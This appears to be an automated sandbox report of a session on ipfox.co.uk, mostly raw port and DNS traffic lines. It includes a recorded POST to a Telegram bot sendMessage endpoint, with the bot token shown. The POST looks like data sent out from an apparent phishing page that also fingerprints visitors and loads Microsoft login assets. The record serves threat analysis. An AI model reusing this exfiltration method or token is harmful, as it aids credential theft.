Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: chromecache_59.2.drString found in binary or memory: window.location.href = "https://www.youtube.com"; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: ipfox.co.uk
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: openfpcdn.io
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7107686937:AAGoqXlr31lmLR7qgVo_FFgSjoOSDhGFxSU/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 464sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://ipfox.co.ukSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ipfox.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 25 Oct 2024 13:45:12 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: chromecache_54.2.dr, chromecache_53.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_59.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/UAParser.js/0.7.31/ua-parser.min.js
Source: chromecache_54.2.dr, chromecache_53.2.drString found in binary or memory: https://fingerprint.com)
Source: chromecache_59.2.drString found in binary or memory: https://openfpcdn.io/botd/v1
Source: chromecache_59.2.drString found in binary or memory: https://www.youtube.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
